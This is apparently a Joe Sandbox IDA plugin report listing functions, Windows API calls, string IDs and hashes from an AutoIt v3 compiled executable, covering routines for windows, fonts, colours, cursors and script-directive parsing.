                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_4937000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                                                                                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                                                                                                                                                                                                                                                                                                                                                                                                • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004), ref: 00459865
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 004598CD
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004598F8
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00459916
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0045993A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 004599FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4040870279-2373415609
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000012), ref: 0044181E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetTextColor.GDI32(?,?), ref: 00441826
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(0000000F), ref: 00441849
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 00441864
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,?), ref: 00441874
                                                                                                                                                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSysColor.USER32(00000010), ref: 004418B2
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004418D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                                                                                                                                                                                                                                                                                                                                                                                                                • FillRect.USER32(?,?,?), ref: 00441970
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 69173610-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 004590F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                                                                                                                                                                                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                                                                                                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1038674560-3360698832
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043075B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430773
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043078B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307BB
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307D3
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 004307EB
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430803
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043081B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430833
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043084B
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430863
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043087B
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00430887
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0043089F
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Cursor$Load
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1675784387-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
